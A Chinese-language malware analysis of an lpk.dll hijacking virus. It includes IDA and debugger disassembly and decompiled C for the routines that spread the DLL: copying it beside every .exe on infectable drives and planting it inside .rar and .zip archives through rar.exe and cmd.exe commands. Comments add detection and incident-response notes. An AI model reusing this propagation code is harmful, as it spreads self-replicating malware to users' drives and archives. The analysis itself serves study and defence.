lpk类病毒分析
病毒体来源http://www.52pojie.cn/thread-75591-1-1.html
除夕那天晚上写了个 Lpk，并对 lpk 做了点研究，所以今天晚上再看这些应该会方便很多。关于 lpk 的文章请参考我 Blog 上的笔记，这里不再赘述。
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接把 Lpk11.dll 载入 IDA，先看 DllEntryPoint：
.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID
lpReserved)
.text:10001A32 public DllEntryPoint
.text:10001A32 DllEntryPoint proc near
.text:10001A32
.text:10001A32 hLibModule = dword ptr 4
.text:10001A32 fdwReason = dword ptr 8
.text:10001A32 lpReserved = dword ptr 0Ch
.text:10001A32
.text:10001A32 cmp [esp+fdwReason], 1
.text:10001A37 push esi
.text:10001A38 jnz short loc_10001AA9
.text:10001A3A mov esi, [esp+4+hLibModule]
.text:10001A3E push 104h ; nSize
.text:10001A43 push offset ExistingFileName ; lpFilename
.text:10001A48 push esi ; hModule
.text:10001A49 mov dword_10003290, esi
.text:10001A4F call ds:GetModuleFileNameW
.text:10001A55 push esi ; hLibModule
.text:10001A56 call ds:DisableThreadLibraryCalls
.text:10001A5C call GetMutexName
.text:10001A61 cmp eax, 1
.text:10001A64 jnz short loc_10001AA2
.text:10001A66 call IsVirusKernelFile ;用来判断是否由病毒核
心进程释放
.text:10001A6B test eax, eax
.text:10001A6D jnz short loc_10001A7D
.text:10001A6F call CreateMutex
.text:10001A74 test eax, eax
.text:10001A76 jnz short loc_10001A7D
.text:10001A78 call ExpandVirusKernel
.text:10001A7D
.text:10001A7D loc_10001A7D: ; CODE XREF: DllEntryPoint+3Bj
.text:10001A7D ; DllEntryPoint+44j
.text:10001A7D call IsCurrentFileLpk
.text:10001A82 cmp eax, 1
.text:10001A85 jnz short loc_10001AA2
.text:10001A87 push 0 ; lpName
.text:10001A89 push 0 ; bInitialState
.text:10001A8B push eax ; bManualReset
.text:10001A8C push 0 ; lpEventAttributes
.text:10001A8E call ds:CreateEventW
.text:10001A94 mov hHandle, eax
.text:10001A99 test eax, eax
.text:10001A9B jz short loc_10001AA2
.text:10001A9D call StartInfectThraed
.text:10001AA2
.text:10001AA2 loc_10001AA2: ; CODE XREF: DllEntryPoint+32j
.text:10001AA2 ; DllEntryPoint+53j ...
.text:10001AA2 call InitLpk
.text:10001AA7 jmp short loc_10001AEC
.text:10001AA9 ; ---------------------------------------------------------------------------
009119E6 <lpk11.StartThread> /$ 56 push esi
009119E7 |. 33F6 xor esi, esi
009119E9 |. 56 push esi ;
/pThreadId => NULL
009119EA |. 6A 04 push 4 ; |
CreationFlags = CREATE_SUSPENDED
009119EC |. 56 push esi ; |
pThreadParm => NULL
009119ED |. 68 D3189100 push <FuckAllDisk> ; |
ThreadFunction = <lpk11.FuckAllDisk>
009119F2 |. 56 push esi ; |
StackSize => 0
009119F3 |. 56 push esi ; |
pSecurity => NULL
009119F4 |. FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>;
\CreateThread
009118D3 <lpk11.FuckAllDisk> . 81EC C4000000 sub esp, 0C4
009118D9 . 53 push ebx
009118DA . 55 push ebp
009118DB . 56 push esi
009118DC . 57 push edi
009118DD . 6A 60 push 60 ;
/Length = 60 (96.)
009118DF . 8D4424 78 lea eax, dword ptr [esp+78] ; |
009118E3 . 50 push eax ; |
Destination
009118E4 . 33FF xor edi, edi ; |
009118E6 . FF15 34209100 call dword ptr [<&KERNEL32.RtlZeroMem>;
\RtlZeroMemory
009118EC > 6A 02 push 2
009118EE . 5B pop ebx
009118EF . 8D6C24 74 lea ebp, dword ptr [esp+74]
009118F3 . C74424 10 180>mov dword ptr [esp+10], 18
009118FB > 837D 00 01 cmp dword ptr [ebp], 1
009118FF . 74 5B je short 0091195C
00911901 . 53 push ebx
00911902 . FF15 B4209100 call dword ptr [<&SHELL32.#64>] ;
shell32.DriveType
00911908 . 83C0 FE add eax, -2
0091190B . 83F8 02 cmp eax, 2 ; 类
型否为可感染类型?
0091190E . 77 4C ja short 0091195C
00911910 . 33C0 xor eax, eax
00911912 . 50 push eax ;
/pThreadId => NULL
00911913 . 6A 04 push 4 ; |
CreationFlags = CREATE_SUSPENDED
00911915 . 53 push ebx ; |
pThreadParm
00911916 . 68 77169100 push <Infect> ; |
ThreadFunction = <lpk11.Infect>
0091191B . 50 push eax ; |
StackSize => 0
0091191C . 50 push eax ; |
pSecurity => NULL
0091191D . FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>;
\CreateThread
signed int __stdcall Infect(LPCWSTR lpString1)
{
const WCHAR *v2; // [url=mailto:eax@17]eax@17[/url]
struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
WCHAR String2; // [sp+254h] [bp-418h]@4
WCHAR FileName; // [sp+45Ch] [bp-210h]@6
HANDLE hFindFile; // [sp+664h] [bp-8h]@6
int v7; // [sp+668h] [bp-4h]@1
const WCHAR *v8; // [sp+674h] [bp+8h]@17
v7 = 1;
if ( WaitForSingleObject(hHandle, 0) != 258 )
return 0;
if ( (unsigned int)lpString1 >= 0x100 )
{
lstrcpyW(&String2, lpString1);
}
else
{
lstrcpyW(&String2, L"A:\\");
String2 += (unsigned __int16)lpString1;
}
lstrcpyW(&FileName, &String2);
PathAppendW(&String2, &word_10002374);
hFindFile = FindFirstFileW(&String2, &FindFileData);
if ( hFindFile == (HANDLE)-1 )
return 1;
lstrcpyW(&String2, &FileName);
while ( 1 )
{
if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..")
)
goto LABEL_27;
if ( FindFileData.dwFileAttributes & 0x10 )
break;
v2 = PathFindExtensionW(FindFileData.cFileName);
v8 = v2;
if ( v2 )
{
if ( !lstrcmpiW(v2, L".EXE") ) // 目录下有exe就将lpk复制过去
{
lstrcpyW(&FileName, &String2);
PathAppendW(&FileName, L"lpk.dll");
if ( GetFileAttributesW(&FileName) != -1 )
goto LABEL_27;
CopyFileW(&ExistingFileName, &FileName, 1);
SetFileAttributesW(&FileName, 7u);
}
if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// 压缩包感染过程
{
if ( !FindFileData.nFileSizeHigh )
{
if ( FindFileData.nFileSizeLow < 0x3200000 )
{
lstrcpyW(&FileName, &String2);
PathAppendW(&FileName, FindFileData.cFileName);
InfectCompressFile(&FileName);
}
}
}
}
/*
 * InfectCompressFile: plants lpk.dll inside a .rar/.zip archive by driving the
 * victim's own WinRAR console tool (rar.exe) through cmd.exe. This is Hex-Rays
 * output: the variable names, the single-WCHAR "buffers" and the int parameter
 * are decompiler artefacts, not the author's types.
 *
 * a1      path of the archive to infect; used as a wide string in every command
 *         line below (the caller in Infect() passes a WCHAR buffer).
 * returns whatever is left in `result`: the SHRegGetValueW status if the
 *         registry lookup fails, GetFileAttributesW's -1 if rar.exe is absent,
 *         otherwise an UpdatePackage return value. Callers cannot read
 *         "archive was infected" out of it.
 *
 * Detection / IR notes, all taken from the literals in this function:
 *   - reads HKCR\WinRAR\shell\open\command to locate the WinRAR install dir
 *     (rar.exe is expected beside the registered executable)
 *   - uses a scratch directory under %TEMP% whose name starts with "IRAR"
 *   - process-creation events to hunt for:
 *       cmd /c <rar.exe> vb "<archive>" lpk.dll|find /i "lpk.dll"
 *       "<rar.exe>" x "<archive>" *.exe "<tmp>\"
 *       "<rar.exe>" a -r -ep1"<tmp>" "<archive>" "<tmp>\lpk.dll"
 *       cmd /c RD /s /q "<tmp>"
 *   - the archive path is spliced into a cmd.exe command line unescaped, and
 *     every command is formatted with wsprintfW (no length argument) into a
 *     stack buffer whose size, from the frame offsets (0x824 - 0x414 = 0x410
 *     bytes = 520 WCHARs), is never enforced; long paths could overrun it.
 */
DWORD __cdecl InfectCompressFile(int a1)
{
DWORD result; // eax@1
wchar_t v2[2]; // eax@3 -- actually holds a pointer to the delimiter string (see below)
UINT v3; // eax@6
WCHAR CommandLine; // [sp+0h] [bp-824h]@6 -- start of the command-line buffer
WCHAR PathName; // [sp+410h] [bp-414h]@6 -- %TEMP% path, then the IRAR scratch dir
WCHAR FileName; // [sp+618h] [bp-20Ch]@1 -- registry value, later the rar.exe path
const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3 -- FileName + 1 WCHAR, i.e. the value without its first character
int v8; // [sp+820h] [bp-4h]@1 -- in/out byte size of FileName for SHRegGetValueW
v8 = 520; // 260 WCHARs (MAX_PATH) expressed in bytes
// Default WinRAR "open" verb, typically "<dir>\WinRAR.exe" "%1". The flags value 2 is
// presumably the REG_SZ-only restriction (SRRF_RT_REG_SZ) -- confirm against shlwapi.h.
result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0,
&FileName, &v8);
if ( !result )
{
// Isolate the executable path from the command string. 34 == L'"'.
if ( FileName == 34 )
{
// Quoted form: shift the string left by one WCHAR (overlapping lstrcpyW from
// FileName+1 into FileName) to drop the opening quote; cut at the closing quote.
lstrcpyW(&FileName, &String2);
*(_DWORD *)v2 = L"\"";
}
else
{
// Unquoted form: the path ends at the first space.
*(_DWORD *)v2 = L" ";
}
result = StrStrIW(&FileName, *(_DWORD *)v2);
if ( result )
{
*(_WORD *)result = 0; // terminate at the delimiter; the rest of the command ("%1" etc.) is discarded
// The console tool is expected in the same directory as the registered executable;
// bail out if it is not installed.
PathRemoveFileSpecW(&FileName);
PathAppendW(&FileName, L"rar.exe");
result = GetFileAttributesW(&FileName);
if ( result != -1 )
{
PathGetShortPath(&FileName); // local helper, not shown; presumably 8.3 form so the unquoted %s in the first command survives spaces -- verify
GetTempPathW(MAX_PATH, &PathName);
// Scratch name under %TEMP% with prefix "IRAR". uUnique (the thread id) is non-zero,
// so per the GetTempFileName contract the name is formed but no file is created;
// the commands below use it as a directory.
v3 = GetCurrentThreadId();
GetTempFileNameW(&PathName, L"IRAR", v3, &PathName);
// Step 1: ask rar.exe for a bare listing and grep it for lpk.dll. The format string
// has two %s but three arguments are passed; the trailing &PathName is ignored.
// The function-pointer cast is the decompiler's rendering of the variadic call.
((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
&CommandLine,
L"cmd /c %s vb \"%s\" lpk.dll|find /i \"lpk.dll\"",
&FileName,
a1,
&PathName);
// UpdatePackage (not shown) presumably runs the command and waits up to the given
// milliseconds; _MAX_WAIT_MALLOC_CRT is the CRT constant name Hex-Rays picked for
// 60000. A non-zero result is treated as "lpk.dll not present yet" -- consistent
// with find.exe exiting 1 on no match, but confirm against UpdatePackage.
result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
if ( result )
{
// Step 2: extract every .exe in the archive into the scratch dir (120000 ms wait).
wsprintfW(&CommandLine, L"\"%s\" x \"%s\" *.exe \"%s\\\"", &FileName, a1,
&PathName);
UpdatePackage(&CommandLine, 0x1D4C0u);
// Step 3: run Infect() over the scratch dir (a pointer >= 0x100 is taken as a path
// there); if it finds an .exe it copies this DLL in as <tmp>\lpk.dll.
Infect(&PathName);
// Step 4: add <tmp>\lpk.dll back into the archive (240000 ms wait). Note the literal
// has no space between -ep1 and the quoted scratch path, so as written rar.exe
// receives -ep1"<tmp>" as a single switch -- verify how rar parses it.
wsprintfW(&CommandLine, L"\"%s\" a -r -ep1\"%s\" \"%s\" \"%s\\lpk.dll\"", &FileName,
&PathName, a1, &PathName);
UpdatePackage(&CommandLine, 0x3A980u);
// Step 5: delete the scratch dir and everything extracted into it.
wsprintfW(&CommandLine, L"cmd /c RD /s /q \"%s\"", &PathName);
result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
}
}
}
}
return result;
}
FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA